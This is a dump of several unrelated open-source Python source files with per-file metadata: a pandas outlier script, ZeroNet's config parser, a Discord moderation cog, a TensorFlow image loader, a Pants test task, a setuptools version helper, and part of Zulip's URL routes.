.div(total_insulated_4a.std()).abs().lt(3).sum()) / total_insulated_4a.shape[0] outliers_zd_high_insulated = (dresdenzd_highratio_insulated_4a.shape[0] - dresdenzd_highratio_insulated_4a.sub(dresdenzd_highratio_insulated_4a.mean()) .div(dresdenzd_highratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_highratio_insulated_4a.shape[0] outliers_zp_high_insulated = (dresdenzp_highratio_insulated_4a.shape[0] - dresdenzp_highratio_insulated_4a.sub(dresdenzp_highratio_insulated_4a.mean()) .div(dresdenzp_highratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_highratio_insulated_4a.shape[0] outliers_pd_high_insulated = (postdam_highratio_insulated_4a.shape[0] - postdam_highratio_insulated_4a.sub(postdam_highratio_insulated_4a.mean()) .div(postdam_highratio_insulated_4a.std()).abs().lt(3).sum()) \ / postdam_highratio_insulated_4a.shape[0] outliers_zd_low_insulated = (dresdenzd_lowratio_insulated_4a.shape[0] - dresdenzd_lowratio_insulated_4a.sub(dresdenzd_lowratio_insulated_4a.mean()) .div(dresdenzd_lowratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzd_lowratio_insulated_4a.shape[0] outliers_zp_low_insulated = (dresdenzp_lowratio_insulated_4a.shape[0] - dresdenzp_lowratio_insulated_4a.sub(dresdenzp_lowratio_insulated_4a.mean()) .div(dresdenzp_lowratio_insulated_4a.std()).abs().lt(3).sum()) \ / dresdenzp_lowratio_insulated_4a.shape[0] outliers_pd_low_insulated = (postdam_lowratio_insulated_4a.shape[0] - postdam_lowratio_insulated_4a.sub(postdam_lowratio_insulated_4a.mean()) .div(postdam_lowratio_insulated_4a.std()).abs().lt(3).sum()) \ / postdam_lowratio_insulated_4a.shape[0] std2_insulated_ratio_ = pd.concat([outliers_total_insulated, outliers_zd_high_insulated, outliers_zp_high_insulated, outliers_pd_high_insulated, outliers_zd_low_insulated, outliers_zp_low_insulated, outliers_pd_low_insulated], axis=1) std2_insulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None", "Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate", "Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate", "Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate", "Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate", "Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate", "Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate"] return std2_insulated_ratio_ #std3_ratio(False, True)
mit
-2,501,209,804,834,219,500
55.575851
120
0.600088
false
bloff/ZeroNet
src/Config.py
1
11857
import argparse import sys import os import ConfigParser class Config(object): def __init__(self, argv): self.version = "0.3.1" self.rev = 307 self.argv = argv self.action = None self.createParser() self.createArguments() def createParser(self): # Create parser self.parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) self.parser.register('type', 'bool', self.strToBool) self.subparsers = self.parser.add_subparsers(title="Action to perform", dest="action") def __str__(self): return str(self.arguments).replace("Namespace", "Config") # Using argparse str output # Convert string to bool def strToBool(self, v): return v.lower() in ("yes", "true", "t", "1") # Create command line arguments def createArguments(self): # Platform specific if sys.platform.startswith("win"): coffeescript = "type %s | tools\\coffee\\coffee.cmd" else: coffeescript = None use_openssl = True # Main action = self.subparsers.add_parser("main", help='Start UiServer and FileServer (default)') # SiteCreate action = self.subparsers.add_parser("siteCreate", help='Create a new site') # SiteSign action = self.subparsers.add_parser("siteSign", help='Update and sign content.json: address [privatekey]') action.add_argument('address', help='Site to sign') action.add_argument('privatekey', help='Private key (default: ask on execute)', nargs='?') action.add_argument('--inner_path', help='File you want to sign (default: content.json)', default="content.json", metavar="inner_path") action.add_argument('--publish', help='Publish site after the signing', action='store_true') # SitePublish action = self.subparsers.add_parser("sitePublish", help='Publish site to other peers: address') action.add_argument('address', help='Site to publish') action.add_argument('peer_ip', help='Peer ip to publish (default: random peers ip from tracker)', default=None, nargs='?') action.add_argument('peer_port', help='Peer port to publish (default: random peer port from tracker)', default=15441, nargs='?') action.add_argument('--inner_path', help='Content.json you want to publish (default: content.json)', default="content.json", metavar="inner_path") # SiteVerify action = self.subparsers.add_parser("siteVerify", help='Verify site files using sha512: address') action.add_argument('address', help='Site to verify') # dbRebuild action = self.subparsers.add_parser("dbRebuild", help='Rebuild site database cache') action.add_argument('address', help='Site to rebuild') # dbQuery action = self.subparsers.add_parser("dbQuery", help='Query site sql cache') action.add_argument('address', help='Site to query') action.add_argument('query', help='Sql query') # PeerPing action = self.subparsers.add_parser("peerPing", help='Send Ping command to peer') action.add_argument('peer_ip', help='Peer ip') action.add_argument('peer_port', help='Peer port', nargs='?') # PeerGetFile action = self.subparsers.add_parser("peerGetFile", help='Request and print a file content from peer') action.add_argument('peer_ip', help='Peer ip') action.add_argument('peer_port', help='Peer port') action.add_argument('site', help='Site address') action.add_argument('filename', help='File name to request') # PeerGetFile action = self.subparsers.add_parser("peerCmd", help='Request and print a file content from peer') action.add_argument('peer_ip', help='Peer ip') action.add_argument('peer_port', help='Peer port') action.add_argument('cmd', help='Command to execute') action.add_argument('parameters', help='Parameters to command', nargs='?') # CryptSign action = self.subparsers.add_parser("cryptSign", help='Sign message using Bitcoin private key') action.add_argument('message', help='Message to sign') action.add_argument('privatekey', help='Private key') # Config parameters self.parser.add_argument('--debug', help='Debug mode', action='store_true') self.parser.add_argument('--debug_socket', help='Debug socket connections', action='store_true') self.parser.add_argument('--config_file', help='Path of config file', default="zeronet.conf", metavar="path") self.parser.add_argument('--data_dir', help='Path of data directory', default="data", metavar="path") self.parser.add_argument('--log_dir', help='Path of logging directory', default="log", metavar="path") self.parser.add_argument('--ui_ip', help='Web interface bind address', default="127.0.0.1", metavar='ip') self.parser.add_argument('--ui_port', help='Web interface bind port', default=43110, type=int, metavar='port') self.parser.add_argument('--ui_restrict', help='Restrict web access', default=False, metavar='ip', nargs='*') self.parser.add_argument('--open_browser', help='Open homepage in web browser automatically', nargs='?', const="default_browser", metavar='browser_name') self.parser.add_argument('--homepage', help='Web interface Homepage', default='1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr', metavar='address') self.parser.add_argument('--size_limit', help='Default site size limit in MB', default=10, metavar='size') self.parser.add_argument('--fileserver_ip', help='FileServer bind address', default="*", metavar='ip') self.parser.add_argument('--fileserver_port', help='FileServer bind port', default=15441, type=int, metavar='port') self.parser.add_argument('--disable_udp', help='Disable UDP connections', action='store_true') self.parser.add_argument('--proxy', help='Socks proxy address', metavar='ip:port') self.parser.add_argument('--ip_external', help='External ip (tested on start if None)', metavar='ip') self.parser.add_argument('--use_openssl', help='Use OpenSSL liblary for speedup', type='bool', choices=[True, False], default=use_openssl) self.parser.add_argument('--disable_encryption', help='Disable connection encryption', action='store_true') self.parser.add_argument('--disable_sslcompression', help='Disable SSL compression to save memory', type='bool', choices=[True, False], default=True) self.parser.add_argument('--coffeescript_compiler', help='Coffeescript compiler for developing', default=coffeescript, metavar='executable_path') self.parser.add_argument('--version', action='version', version='ZeroNet %s r%s' % (self.version, self.rev)) return self.parser # Find arguments specificed for current action def getActionArguments(self): back = {} arguments = self.parser._subparsers._group_actions[0].choices[self.action]._actions[1:] # First is --version for argument in arguments: back[argument.dest] = getattr(self, argument.dest) return back # Try to find action from argv def getAction(self, argv): actions = [action.choices.keys() for action in self.parser._actions if action.dest == "action"][0] # Valid actions found_action = False for action in actions: # See if any in argv if action in argv: found_action = action break return found_action # Move plugin parameters to end of argument list def moveUnknownToEnd(self, argv, default_action): valid_actions = sum([action.option_strings for action in self.parser._actions], []) valid_parameters = [] plugin_parameters = [] plugin = False for arg in argv: if arg.startswith("--"): if arg not in valid_actions: plugin = True else: plugin = False elif arg == default_action: plugin = False if plugin: plugin_parameters.append(arg) else: valid_parameters.append(arg) return valid_parameters + plugin_parameters # Parse arguments from config file and command line def parse(self, silent=False, parse_config=True): if silent: # Don't display messages or quit on unknown parameter original_print_message = self.parser._print_message original_exit = self.parser.exit def silent(parser, function_name): parser.exited = True return None self.parser.exited = False self.parser._print_message = lambda *args, **kwargs: silent(self.parser, "_print_message") self.parser.exit = lambda *args, **kwargs: silent(self.parser, "exit") argv = self.argv[:] # Copy command line arguments if parse_config: argv = self.parseConfig(argv) # Add arguments from config file self.parseCommandline(argv, silent) # Parse argv self.setAttributes() if silent: # Restore original functions if self.parser.exited and self.action == "main": # Argument parsing halted, don't start ZeroNet with main action self.action = None self.parser._print_message = original_print_message self.parser.exit = original_exit # Parse command line arguments def parseCommandline(self, argv, silent=False): # Find out if action is specificed on start action = self.getAction(argv) if not action: argv.append("main") action = "main" argv = self.moveUnknownToEnd(argv, action) if silent: res = self.parser.parse_known_args(argv[1:]) if res: self.arguments = res[0] else: self.arguments = {} else: self.arguments = self.parser.parse_args(argv[1:]) # Parse config file def parseConfig(self, argv): # Find config file path from parameters config_file = "zeronet.conf" if "--config_file" in argv: config_file = argv[argv.index("--config_file") + 1] # Load config file if os.path.isfile(config_file): config = ConfigParser.ConfigParser(allow_no_value=True) config.read(config_file) for section in config.sections(): for key, val in config.items(section): if section != "global": # If not global prefix key with section key = section + "_" + key if val: argv.insert(1, val) argv.insert(1, "--%s" % key) return argv # Expose arguments as class attributes def setAttributes(self): # Set attributes from arguments if self.arguments: args = vars(self.arguments) for key, val in args.items(): setattr(self, key, val) def loadPlugins(self): from Plugin import PluginManager @PluginManager.acceptPlugins class ConfigPlugin(object): def __init__(self, config): self.parser = config.parser self.createArguments() def createArguments(self): pass ConfigPlugin(self) config = Config(sys.argv)
gpl-2.0
6,955,166,451,912,471,000
44.779923
126
0.609007
false
MaT1g3R/YasenBaka
cogs/moderation.py
1
3215
from discord import DiscordException, Forbidden, HTTPException from discord.ext import commands from discord.ext.commands import Context from bot import Yasen from scripts.checks import has_manage_message, is_admin, no_pm from scripts.discord_utils import leading_members from scripts.helpers import parse_number class Moderation: """ Moderation commands. """ __slots__ = ('bot',) def __init__(self, bot: Yasen): self.bot = bot def __local_check(self, ctx: Context): return no_pm(ctx) @commands.command() @commands.check(is_admin) async def masspm(self, ctx: Context, *, args: str = None): """ Description: Send pm to all mentioned members. Restriction: Cannot be used in private message. Permission Required: Administrator Usage: "`{prefix}masspm @mention0 @mention1 my message`" """ if not args: await ctx.send( 'Please mention at least one member and include ' 'a message to send.' ) return members, msg = leading_members(ctx, args) if not members: await ctx.send('Please mention at least one member.') return if not msg: await ctx.send('Please enter a message for me to send.') return sent = [] failed = [] for m in members: try: await m.send(msg) sent.append(m.display_name) except DiscordException as e: self.bot.logger.warn(str(e)) failed.append(m.display_name) success_msg = (f'PM sent to the following members:' f'\n```\n{", ".join(sent)}\n```') if sent else '' failed_msg = (f'Failed to send PMs to the following members:' f'\n```\n{", ".join(failed)}\n```') if failed else '' if success_msg or failed_msg: await ctx.send(f'{success_msg}{failed_msg}') @commands.command() @commands.check(has_manage_message) async def purge(self, ctx: Context, num=None): """ Description: Purge up to 99 messages in the current channel. Restriction: | Cannot be used in private message. Can only purge from 1 to 99 (inclusive) messages at once. Permission Required: Manage Messages Usage: "`{prefix}purge num` where num is a number between 1 and 99." """ num = parse_number(num, int) or 0 if not 1 <= num <= 99: await ctx.send( 'Please enter a number between 1 and 99.', delete_after=3 ) return try: deleted = await ctx.channel.purge(limit=num + 1) except Forbidden: await ctx.send('I do not have the permissions to purge messages.') except HTTPException: await ctx.send(':no_entry_sign: Purging messages failed.') else: deleted_num = len(deleted) - 1 msg_str = (f'{deleted_num} message' if num == 1 else f'{deleted_num} messages') await ctx.send(f':recycle: Purged {msg_str}.', delete_after=3)
apache-2.0
-242,369,800,436,003,700
35.534091
78
0.565474
false
ceroytres/cat_nets
cat_nets/datasets/read_pets.py
1
1970
from __future__ import print_function from __future__ import division from __future__ import absolute_import import tensorflow as tf import csv def catClassification_loader(path): cat_names = ['Abyssinian','Bengal','Birman','Bombay','British_Shorthair', 'Egyptian_Mau','Maine_Coon','Persian','Ragdoll','Russian_Blue', 'Siamese','Sphynx'] cat_dict = dict(zip(cat_names,range(len(cat_names)))) labels_list, filename_list = [], [] with open(path,mode = 'r') as csvfile: reader = csv.reader(csvfile, delimiter = ',') for row in reader: labels_list.append(cat_dict[row[0]]) filename_list.append(row[1]) labels_list = tf.convert_to_tensor(labels_list) images_list = tf.convert_to_tensor(filename_list) filename_queue = tf.train.slice_input_producer([labels_list,images_list], shuffle=True) label = filename_queue[0] filename = filename_queue[1] raw_image = tf.read_file(filename) image = tf.image.decode_jpeg(raw_image, channels = 3) cat_dict = dict(zip(cat_dict.values(),cat_dict.keys())) return image, label, cat_dict # image = tf.image.resize_images(image,image_size, # method = tf.image.ResizeMethod.BILINEAR, # align_corners= True) # image = tf.cast(image, tf.uint8) # # batch_size = batch_size # # capacity = min_after_dequeue + 3 * batch_size # # image_batch, label_batch = tf.train.shuffle_batch([image,label], # batch_size = batch_size, # capacity = capacity, # min_after_dequeue = min_after_dequeue, # num_threads=num_threads) # return image_batch,label_batch
mit
-7,524,138,306,632,480,000
32.561404
91
0.540102
false
tejal29/pants
src/python/pants/backend/jvm/tasks/specs_run.py
1
3288
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) from twitter.common.collections import OrderedSet from pants.backend.jvm.tasks.jvm_task import JvmTask from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin from pants.base.exceptions import TaskError from pants.base.workunit import WorkUnit from pants.binary_util import safe_args from pants.java.util import execute_java class SpecsRun(JvmTask, JvmToolTaskMixin): @classmethod def register_options(cls, register): super(SpecsRun, cls).register_options(register) register('--skip', action='store_true', help='Skip running specs.') register('--test', action='append', help='Force running of just these specs. Tests can be specified either by fully ' 'qualified classname or full file path.') # TODO: Get rid of this in favor of the inherited global color flag. register('--color', action='store_true', default=True, help='Emit test result with ANSI terminal color codes.') cls.register_jvm_tool(register, 'specs', default=['//:scala-specs']) @classmethod def prepare(cls, options, round_manager): super(SpecsRun, cls).prepare(options, round_manager) # TODO(John Sirois): these are fake requirements in order to force compile run before this # goal. Introduce a RuntimeClasspath product for JvmCompile and PrepareResources to populate # and depend on that. # See: https://github.com/pantsbuild/pants/issues/310 round_manager.require_data('resources_by_target') round_manager.require_data('classes_by_target') def __init__(self, *args, **kwargs): super(SpecsRun, self).__init__(*args, **kwargs) self.skip = self.get_options().skip self.color = self.get_options().color self.tests = self.get_options().test def execute(self): if not self.skip: targets = self.context.targets() def run_tests(tests): args = ['--color'] if self.color else [] args.append('--specs=%s' % ','.join(tests)) specs_runner_main = 'com.twitter.common.testing.ExplicitSpecsRunnerMain' bootstrapped_cp = self.tool_classpath('specs') classpath = self.classpath(bootstrapped_cp, confs=self.confs) result = execute_java( classpath=classpath, main=specs_runner_main, jvm_options=self.jvm_options, args=self.args + args, workunit_factory=self.context.new_workunit, workunit_name='specs', workunit_labels=[WorkUnit.TEST] ) if result != 0: raise TaskError('java %s ... exited non-zero (%i)' % (specs_runner_main, result)) if self.tests: run_tests(self.tests) else: with safe_args(self.calculate_tests(targets)) as tests: if tests: run_tests(tests) def calculate_tests(self, targets): tests = OrderedSet() for target in targets: if target.is_scala and target.is_test: tests.update(target.sources_relative_to_buildroot()) return tests
apache-2.0
4,884,048,821,790,029,000
38.142857
96
0.673054
false
rwgdrummer/maskgen
setuptools-version/setuptools_maskgen_version.py
1
1613
from pkg_resources import get_distribution from subprocess import check_output import requests import json repos = 'rwgdrummer/maskgen' giturl = 'https://api.github.com/repos' def get_commit(): url = giturl + '/' + repos + '/pulls?state=closed' resp = requests.get(url) if resp.status_code == requests.codes.ok: content = json.loads(resp.content) for item in content: if 'merged_at' in item and 'merge_commit_sha' in item: return item['merge_commit_sha'] return None def get_version(): import os filename = 'VERSION' #if os.path.exists('.git/ORIG_HEAD'): # filename = '.git/ORIG_HEAD' #else: print os.path.abspath(filename) with open(filename) as fp: return fp.readline() def validate_version_format(dist, attr, value): try: version = get_version().strip() except: version = get_distribution(dist.get_name()).version else: version = format_version(version=version, fmt=value) dist.metadata.version = version def format_version(version, fmt='{gitsha}'): return fmt.format(gitsha=version) if __name__ == "__main__": # determine version from git git_version = get_version().strip() git_version = format_version(version=git_version) # monkey-patch `setuptools.setup` to inject the git version import setuptools original_setup = setuptools.setup def setup(version=None, *args, **kw): return original_setup(version=git_version, *args, **kw) setuptools.setup = setup # import the packages's setup module import setup
bsd-3-clause
-12,361,799,161,684,228
27.298246
66
0.651581
false
rishig/zulip
zproject/urls.py
1
36270
from django.conf import settings from django.conf.urls import url, include from django.conf.urls.i18n import i18n_patterns from django.http import HttpResponseBadRequest, HttpRequest, HttpResponse from django.views.generic import TemplateView, RedirectView from django.utils.module_loading import import_string import os import zerver.forms from zproject import dev_urls from zproject.legacy_urls import legacy_urls from zerver.views.documentation import IntegrationView, MarkdownDirectoryView from zerver.lib.integrations import WEBHOOK_INTEGRATIONS from django.contrib.auth.views import (login, password_reset_done, password_reset_confirm, password_reset_complete) import zerver.tornado.views import zerver.views import zerver.views.auth import zerver.views.archive import zerver.views.camo import zerver.views.compatibility import zerver.views.home import zerver.views.email_mirror import zerver.views.registration import zerver.views.zephyr import zerver.views.users import zerver.views.unsubscribe import zerver.views.documentation import zerver.views.user_groups import zerver.views.user_settings import zerver.views.muting import zerver.views.streams import zerver.views.realm import zerver.views.digest import zerver.views.messages from zerver.context_processors import latest_info_context import zerver.views.public_export from zerver.lib.rest import rest_dispatch if settings.TWO_FACTOR_AUTHENTICATION_ENABLED: from two_factor.urls import urlpatterns as tf_urls from two_factor.gateways.twilio.urls import urlpatterns as tf_twilio_urls # NB: There are several other pieces of code which route requests by URL: # # - legacy_urls.py contains API endpoint written before the redesign # and should not be added to. # # - runtornado.py has its own URL list for Tornado views. See the # invocation of web.Application in that file. # # - The Nginx config knows which URLs to route to Django or Tornado. # # - Likewise for the local dev server in tools/run-dev.py. # These endpoints constitute the currently designed API (V1), which uses: # * REST verbs # * Basic auth (username:password is email:apiKey) # * Take and return json-formatted data # # If you're adding a new endpoint to the code that requires authentication, # please add it here. # See rest_dispatch in zerver.lib.rest for an explanation of auth methods used # # All of these paths are accessed by either a /json or /api/v1 prefix; # e.g. `PATCH /json/realm` or `PATCH /api/v1/realm`. v1_api_and_json_patterns = [ # realm-level calls url(r'^realm$', rest_dispatch, {'PATCH': 'zerver.views.realm.update_realm'}), # Returns a 204, used by desktop app to verify connectivity status url(r'generate_204$', zerver.views.registration.generate_204, name='zerver.views.registration.generate_204'), url(r'realm/subdomain/(?P<subdomain>\S+)$', zerver.views.realm.check_subdomain_available, name='zerver.views.realm.check_subdomain_available'), # realm/domains -> zerver.views.realm_domains url(r'^realm/domains$', rest_dispatch, {'GET': 'zerver.views.realm_domains.list_realm_domains', 'POST': 'zerver.views.realm_domains.create_realm_domain'}), url(r'^realm/domains/(?P<domain>\S+)$', rest_dispatch, {'PATCH': 'zerver.views.realm_domains.patch_realm_domain', 'DELETE': 'zerver.views.realm_domains.delete_realm_domain'}), # realm/emoji -> zerver.views.realm_emoji url(r'^realm/emoji$', rest_dispatch, {'GET': 'zerver.views.realm_emoji.list_emoji'}), url(r'^realm/emoji/(?P<emoji_name>.*)$', rest_dispatch, {'POST': 'zerver.views.realm_emoji.upload_emoji', 'DELETE': ('zerver.views.realm_emoji.delete_emoji', {"intentionally_undocumented"})}), # this endpoint throws a status code 400 JsonableError when it should be a 404. # realm/icon -> zerver.views.realm_icon url(r'^realm/icon$', rest_dispatch, {'POST': 'zerver.views.realm_icon.upload_icon', 'DELETE': 'zerver.views.realm_icon.delete_icon_backend', 'GET': 'zerver.views.realm_icon.get_icon_backend'}), # realm/logo -> zerver.views.realm_logo url(r'^realm/logo$', rest_dispatch, {'POST': 'zerver.views.realm_logo.upload_logo', 'DELETE': 'zerver.views.realm_logo.delete_logo_backend', 'GET': 'zerver.views.realm_logo.get_logo_backend'}), # realm/filters -> zerver.views.realm_filters url(r'^realm/filters$', rest_dispatch, {'GET': 'zerver.views.realm_filters.list_filters', 'POST': 'zerver.views.realm_filters.create_filter'}), url(r'^realm/filters/(?P<filter_id>\d+)$', rest_dispatch, {'DELETE': 'zerver.views.realm_filters.delete_filter'}), # realm/profile_fields -> zerver.views.custom_profile_fields url(r'^realm/profile_fields$', rest_dispatch, {'GET': 'zerver.views.custom_profile_fields.list_realm_custom_profile_fields', 'PATCH': 'zerver.views.custom_profile_fields.reorder_realm_custom_profile_fields', 'POST': 'zerver.views.custom_profile_fields.create_realm_custom_profile_field'}), url(r'^realm/profile_fields/(?P<field_id>\d+)$', rest_dispatch, {'PATCH': 'zerver.views.custom_profile_fields.update_realm_custom_profile_field', 'DELETE': 'zerver.views.custom_profile_fields.delete_realm_custom_profile_field'}), # realm/deactivate -> zerver.views.deactivate_realm url(r'^realm/deactivate$', rest_dispatch, {'POST': 'zerver.views.realm.deactivate_realm'}), url(r'^realm/presence$', rest_dispatch, {'GET': 'zerver.views.presence.get_statuses_for_realm'}), # users -> zerver.views.users # # Since some of these endpoints do something different if used on # yourself with `/me` as the email, we need to make sure that we # don't accidentally trigger these. The cleanest way to do that # is to add a regular expression assertion that it isn't `/me/` # (or ends with `/me`, in the case of hitting the root URL). url(r'^users$', rest_dispatch, {'GET': 'zerver.views.users.get_members_backend', 'POST': 'zerver.views.users.create_user_backend'}), url(r'^users/(?P<user_id>[0-9]+)/reactivate$', rest_dispatch, {'POST': 'zerver.views.users.reactivate_user_backend'}), url(r'^users/(?!me/)(?P<email>[^/]*)/presence$', rest_dispatch, {'GET': 'zerver.views.presence.get_presence_backend'}), url(r'^users/(?P<user_id>[0-9]+)$', rest_dispatch, {'PATCH': 'zerver.views.users.update_user_backend', 'DELETE': 'zerver.views.users.deactivate_user_backend'}), url(r'^bots$', rest_dispatch, {'GET': 'zerver.views.users.get_bots_backend', 'POST': 'zerver.views.users.add_bot_backend'}), url(r'^bots/(?P<bot_id>[0-9]+)/api_key/regenerate$', rest_dispatch, {'POST': 'zerver.views.users.regenerate_bot_api_key'}), url(r'^bots/(?P<bot_id>[0-9]+)$', rest_dispatch, {'PATCH': 'zerver.views.users.patch_bot_backend', 'DELETE': 'zerver.views.users.deactivate_bot_backend'}), # invites -> zerver.views.invite url(r'^invites$', rest_dispatch, {'GET': 'zerver.views.invite.get_user_invites', 'POST': 'zerver.views.invite.invite_users_backend'}), url(r'^invites/(?P<prereg_id>[0-9]+)$', rest_dispatch, {'DELETE': 'zerver.views.invite.revoke_user_invite'}), url(r'^invites/(?P<prereg_id>[0-9]+)/resend$', rest_dispatch, {'POST': 'zerver.views.invite.resend_user_invite_email'}), # invites/multiuse -> zerver.views.invite url(r'^invites/multiuse$', rest_dispatch, {'POST': 'zerver.views.invite.generate_multiuse_invite_backend'}), # invites/multiuse -> zerver.views.invite url(r'^invites/multiuse/(?P<invite_id>[0-9]+)$', rest_dispatch, {'DELETE': 'zerver.views.invite.revoke_multiuse_invite'}), # mark messages as read (in bulk) url(r'^mark_all_as_read$', rest_dispatch, {'POST': 'zerver.views.messages.mark_all_as_read'}), url(r'^mark_stream_as_read$', rest_dispatch, {'POST': 'zerver.views.messages.mark_stream_as_read'}), url(r'^mark_topic_as_read$', rest_dispatch, {'POST': 'zerver.views.messages.mark_topic_as_read'}), url(r'^zcommand$', rest_dispatch, {'POST': 'zerver.views.messages.zcommand_backend'}), # messages -> zerver.views.messages # GET returns messages, possibly filtered, POST sends a message url(r'^messages$', rest_dispatch, {'GET': 'zerver.views.messages.get_messages_backend', 'POST': ('zerver.views.messages.send_message_backend', {'allow_incoming_webhooks'})}), url(r'^messages/(?P<message_id>[0-9]+)$', rest_dispatch, {'GET': 'zerver.views.messages.json_fetch_raw_message', 'PATCH': 'zerver.views.messages.update_message_backend', 'DELETE': 'zerver.views.messages.delete_message_backend'}), url(r'^messages/render$', rest_dispatch, {'POST': 'zerver.views.messages.render_message_backend'}), url(r'^messages/flags$', rest_dispatch, {'POST': 'zerver.views.messages.update_message_flags'}), url(r'^messages/(?P<message_id>\d+)/history$', rest_dispatch, {'GET': 'zerver.views.messages.get_message_edit_history'}), url(r'^messages/matches_narrow$', rest_dispatch, {'GET': 'zerver.views.messages.messages_in_narrow_backend'}), url(r'^users/me/subscriptions/properties$', rest_dispatch, {'POST': 'zerver.views.streams.update_subscription_properties_backend'}), url(r'^users/me/subscriptions/(?P<stream_id>\d+)$', rest_dispatch, {'PATCH': 'zerver.views.streams.update_subscriptions_property'}), url(r'^submessage$', rest_dispatch, {'POST': 'zerver.views.submessage.process_submessage'}), # New endpoint for handling reactions. url(r'^messages/(?P<message_id>[0-9]+)/reactions$', rest_dispatch, {'POST': 'zerver.views.reactions.add_reaction', 'DELETE': 'zerver.views.reactions.remove_reaction'}), # reactions -> zerver.view.reactions # PUT adds a reaction to a message # DELETE removes a reaction from a message url(r'^messages/(?P<message_id>[0-9]+)/emoji_reactions/(?P<emoji_name>.*)$', rest_dispatch, {'PUT': 'zerver.views.reactions.add_reaction_legacy', 'DELETE': 'zerver.views.reactions.remove_reaction_legacy'}), # attachments -> zerver.views.attachments url(r'^attachments$', rest_dispatch, {'GET': 'zerver.views.attachments.list_by_user'}), url(r'^attachments/(?P<attachment_id>[0-9]+)$', rest_dispatch, {'DELETE': 'zerver.views.attachments.remove'}), # typing -> zerver.views.typing # POST sends a typing notification event to recipients url(r'^typing$', rest_dispatch, {'POST': 'zerver.views.typing.send_notification_backend'}), # user_uploads -> zerver.views.upload url(r'^user_uploads$', rest_dispatch, {'POST': 'zerver.views.upload.upload_file_backend'}), # bot_storage -> zerver.views.storage url(r'^bot_storage$', rest_dispatch, {'PUT': 'zerver.views.storage.update_storage', 'GET': 'zerver.views.storage.get_storage', 'DELETE': 'zerver.views.storage.remove_storage'}), # users/me -> zerver.views url(r'^users/me$', rest_dispatch, {'GET': 'zerver.views.users.get_profile_backend', 'DELETE': 'zerver.views.users.deactivate_user_own_backend'}), # PUT is currently used by mobile apps, we intend to remove the PUT version # as soon as possible. POST exists to correct the erroneous use of PUT. url(r'^users/me/pointer$', rest_dispatch, {'GET': 'zerver.views.pointer.get_pointer_backend', 'PUT': 'zerver.views.pointer.update_pointer_backend', 'POST': 'zerver.views.pointer.update_pointer_backend'}), url(r'^users/me/presence$', rest_dispatch, {'POST': 'zerver.views.presence.update_active_status_backend'}), url(r'^users/me/status$', rest_dispatch, {'POST': 'zerver.views.presence.update_user_status_backend'}), # Endpoint used by mobile devices to register their push # notification credentials url(r'^users/me/apns_device_token$', rest_dispatch, {'POST': 'zerver.views.push_notifications.add_apns_device_token', 'DELETE': 'zerver.views.push_notifications.remove_apns_device_token'}), url(r'^users/me/android_gcm_reg_id$', rest_dispatch, {'POST': 'zerver.views.push_notifications.add_android_reg_id', 'DELETE': 'zerver.views.push_notifications.remove_android_reg_id'}), # user_groups -> zerver.views.user_groups url(r'^user_groups$', rest_dispatch, {'GET': 'zerver.views.user_groups.get_user_group'}), url(r'^user_groups/create$', rest_dispatch, {'POST': 'zerver.views.user_groups.add_user_group'}), url(r'^user_groups/(?P<user_group_id>\d+)$', rest_dispatch, {'PATCH': 'zerver.views.user_groups.edit_user_group', 'DELETE': 'zerver.views.user_groups.delete_user_group'}), url(r'^user_groups/(?P<user_group_id>\d+)/members$', rest_dispatch, {'POST': 'zerver.views.user_groups.update_user_group_backend'}), # users/me -> zerver.views.user_settings url(r'^users/me/api_key/regenerate$', rest_dispatch, {'POST': 'zerver.views.user_settings.regenerate_api_key'}), url(r'^users/me/enter-sends$', rest_dispatch, {'POST': ('zerver.views.user_settings.change_enter_sends', # This endpoint should be folded into user settings {'intentionally_undocumented'})}), url(r'^users/me/avatar$', rest_dispatch, {'POST': 'zerver.views.user_settings.set_avatar_backend', 'DELETE': 'zerver.views.user_settings.delete_avatar_backend'}), # users/me/hotspots -> zerver.views.hotspots url(r'^users/me/hotspots$', rest_dispatch, {'POST': ('zerver.views.hotspots.mark_hotspot_as_read', # This endpoint is low priority for documentation as # it is part of the webapp-specific tutorial. {'intentionally_undocumented'})}), # users/me/tutorial_status -> zerver.views.tutorial url(r'^users/me/tutorial_status$', rest_dispatch, {'POST': ('zerver.views.tutorial.set_tutorial_status', # This is a relic of an old Zulip tutorial model and # should be deleted. {'intentionally_undocumented'})}), # settings -> zerver.views.user_settings url(r'^settings$', rest_dispatch, {'PATCH': 'zerver.views.user_settings.json_change_settings'}), url(r'^settings/display$', rest_dispatch, {'PATCH': 'zerver.views.user_settings.update_display_settings_backend'}), url(r'^settings/notifications$', rest_dispatch, {'PATCH': 'zerver.views.user_settings.json_change_notify_settings'}), # users/me/alert_words -> zerver.views.alert_words url(r'^users/me/alert_words$', rest_dispatch, {'GET': 'zerver.views.alert_words.list_alert_words', 'POST': 'zerver.views.alert_words.add_alert_words', 'DELETE': 'zerver.views.alert_words.remove_alert_words'}), # users/me/custom_profile_data -> zerver.views.custom_profile_data url(r'^users/me/profile_data$', rest_dispatch, {'PATCH': 'zerver.views.custom_profile_fields.update_user_custom_profile_data', 'DELETE': 'zerver.views.custom_profile_fields.remove_user_custom_profile_data'}), url(r'^users/me/(?P<stream_id>\d+)/topics$', rest_dispatch, {'GET': 'zerver.views.streams.get_topics_backend'}), # streams -> zerver.views.streams # (this API is only used externally) url(r'^streams$', rest_dispatch, {'GET': 'zerver.views.streams.get_streams_backend'}), # GET returns `stream_id`, stream name should be encoded in the url query (in `stream` param) url(r'^get_stream_id$', rest_dispatch, {'GET': 'zerver.views.streams.json_get_stream_id'}), # GET returns "stream info" (undefined currently?), 